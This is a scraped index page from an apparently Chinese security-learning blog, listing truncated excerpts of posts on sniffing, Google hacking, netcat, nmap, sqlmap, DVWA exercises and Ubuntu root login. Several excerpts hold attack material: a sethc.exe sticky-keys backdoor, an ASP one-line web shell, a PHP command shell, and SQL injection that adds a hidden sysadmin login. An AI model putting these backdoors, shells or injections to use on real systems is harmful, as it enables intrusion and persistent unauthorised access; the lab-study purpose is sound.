- 博客(32)
- 收藏
- 关注
转载 嗅探器攻击原理
嗅探器(sniffer) 是利用计算机的网络接口截获目的地为其他计算机的数据报文的一种技术。它工作在网络的底层,把网络传输的全部数据记录下来. 嗅探器可以帮助网络管理员查找网络漏洞和检测网络性能.嗅探器可以分析网络的流量,以便找出所关心的网络中潜在的问题。 不同传输介质的网络的可监听性是不同的。一般来说,以太网被监听的可能性比较高,因为以太网是一个广播型的网络;FDDI Token被监听的可
2015-01-06 13:09:33 8216
转载 google search
工具。正因为google的检索能力强大,黑客可以构造特殊的关键字,使用Google搜索互联网上的相关隐私信息。通过Google,黑客甚至可以在几秒种内黑掉一个网站。这种利用Google搜索相关信息并进行入侵的过程就叫做Google Hack。搜索也是一门艺术 在我们平时使用搜索引擎的过程中,通常是将需要搜索的关键字输入搜索引擎,然后就开始了漫长的信息提取过程。其实Go
2015-01-06 13:06:32 468
转载 nc.exe
nc.exe大家也非常熟悉了吧!~之所以叫瑞士军刀,因为它的功能太多,太强大了!~(注:nc是一个在命令提示下用的,并是那种很人性话的图形界面软件!~)(1)格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 (2)格式:nc -l -p 80 讲解:监听本机的TCP80端口 (3)格式:nc -nvv -w2 -z 192.1
2015-01-06 12:55:01 2069
转载 shift
Shitf后门copy c:\windows\explorer.exe c:\windows\system32\sethc.execopy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exeattrib c:\windows\system32\sethc.exe +hattrib c:\windo
2015-01-06 12:45:44 334
转载 xp_cmd
然后sqlmap.py -r s.txt -p TextBox1 --dbs -username -password什么的得出了sa的hash 尝试破解但是没破解出来,不想hash了,毕竟是sa权限。直接提交;exec master.dbo.sp_addlogin vgy95$,V_gy95;--;exec master.dbo.sp_addsrvrolemember vgy95,s
2014-10-15 17:02:05 312
转载 nmap 常用指令
1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O 这里的 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统其它选项:-A 同时打开操作系统指纹和版本检测-v 详细输出扫描
2014-10-15 16:26:28 457
转载 一句话
送上一句话——————————————————————《asp》dim play''''''''''''''''''''''''''''' play = request("08sec") %>what's your nameexecute(play) %>————————————————————————————《php》
2014-10-15 13:40:38 309
转载 sqlmap
以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string
2014-10-15 13:30:28 364
原创 CTF要是我能参加明年的BCTF就。。。。。。。
第一个是MISC:misc其实是英文miscellaneous的前四个字母,表示杂项、混合体、大杂烩的意思。
2014-10-08 20:36:26 582
原创 dom based xss
function test(){var str=document.getElementById("text").value;document.getElementById("t").innerHTML="testLink"}document.getElementById("t").innerHTML="testLink" 这一句是关键 上面的内容是吸纳
2014-10-08 16:07:12 417
转载 make bzImage时出现错误gcc: error: elf_i386/elf_x86_64: No such file or directory
这个问题是由于 gcc 4.6 不再支持 linker-style 架构。将arch/x86/vdso/Makefile中以VDSO_LDFLAGS_vdso.lds开头的语句的"-m elf_x86_64"替换为 "-m64"。VDSO_LDFLAGS_vdso32.lds开头所在行的"-m elf_x86" 替换为"-m32"。然后在执行make bzImage
2014-10-06 13:33:50 742
原创 Stored Cross Site Scripting (XSS)
low: <?phpif(isset($_POST['btnSign'])){ $message = trim($_POST['mtxMessage']); $name = trim($_POST['txtName']); // Sanitize message input $message = stripslashes($message);
2014-10-06 11:49:28 1087
原创 Reflected Cross Site Scripting (XSS)
low; <?phpif(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){ $isempty = true;} else { echo ''; echo 'Hello ' . $_GET['name']; echo '';
2014-10-06 11:24:11 1565
转载 addslashes与mysql_real_escape_string的区别
addslashes和mysql_real_escape_string.都是为了使数据安全的插入到数据库中而进行过滤.那么这两个函数到底是有什么区别呢??我们今天来简单的看下..首先.我们还是从PHP手册入手..手册上addslashes转义的字符是单引号(')、双引号(")、反斜线(\)与NUL(NULL 字符)。mysql_real_escape_string转义的字符并没有被
2014-10-06 09:46:10 300
原创 SQL Injection --low
<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($g
2014-10-05 16:12:16 389
原创 File Inclusion -medium
<?php $file = $_GET['page']; // The page we wish to display // Bad input validation $file = str_replace("http://", "", $file); $file = str_replace("https://", "", $file);
2014-10-05 15:55:13 398
原创 File Inclusion -low
<?php $file = $_GET['page']; //The page we wish to display ?> 这是一个典型的文件包含 还是用GET获取的 在url后面就
2014-10-05 15:44:09 300
原创 Cross Site Request Forgery (CSRF)--medium
<?php if (isset($_GET['Change'])) { // Checks the http referer header if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){ // Turn requests in
2014-10-05 15:01:09 427
转载 PHP - HTTP_REFERER
http://blog.csdn.net/amonest/article/details/6432530看UCHome和ECShop源码的时候,发现经常会用到$_SERVER['HTTP_REFERER']的值。HTTP REFERER是Header的一部分,当浏览器向WEB服务器发送请求的时候,一般会带上HTTP REFERER,告诉服务器我是从哪个页面链接过来的,服务器籍此
2014-10-05 14:51:15 418
原创 Command Execution Source--medium
<?phpif( isset( $_POST[ 'submit'] ) ) { $target = $_REQUEST[ 'ip' ]; // Remove any of the charactars in the array (blacklist). $substitutions = array( '&&' => '', ';' =
2014-10-05 14:23:02 322
转载 php string 函数
addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (')双引号 (")反斜杠 (\)NULL语法addslashes(string)参数描述string必需。规定要检查的字符串。
2014-10-05 13:32:45 384
转载 PHP 获取服务器详细信息代码
获取系统类型及版本号: php_uname() (例:Windows NT COMPUTER 5.1 build 2600)只获取系统类型: php_uname('s') (或:PHP_OS,例:Windows NT)只获取系统版本号: php_uname('r') 获取PHP运行方式: php_sapi_
2014-10-05 12:10:10 402
原创 php_shell
cmd: <?phpif (stristr(php_uname('s'), 'Windows NT')) { echo "windows platform"; echo "";}else{ echo "linux"; echo "";}if( isset( $_GET[ 'submit' ] ) ) { $cmd=$_GET['cmd']; echo "
2014-10-05 12:02:10 316
转载 Ubuntu 14.04 为 root 帐号开启 SSH 登录
Ubuntu 14.04 为 root 帐号开启 SSH 登录1. 修改 root 密码sudo passwd root2. 以其他账户登录,通过 sudo nano 修改 /etc/ssh/sshd_config :xxx@ubuntu14:~$ su - rootPassword:root@ubuntu14:~# vi /etc/ssh/sshd_con
2014-10-04 12:21:13 286
转载 ubuntu14.04 开启root登陆
官网下载地址:http://www.ubuntu.com/download/desktop64位桌面版:http://www.ubuntu.com/ubuntu-releases/14.04/ubuntu-14.04-desktop-amd64.iso安装完成如需使用root身份登录,可打开终端输入以下命令:#设置root密码sudo passwd root#切换到root
2014-10-04 12:11:31 338
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人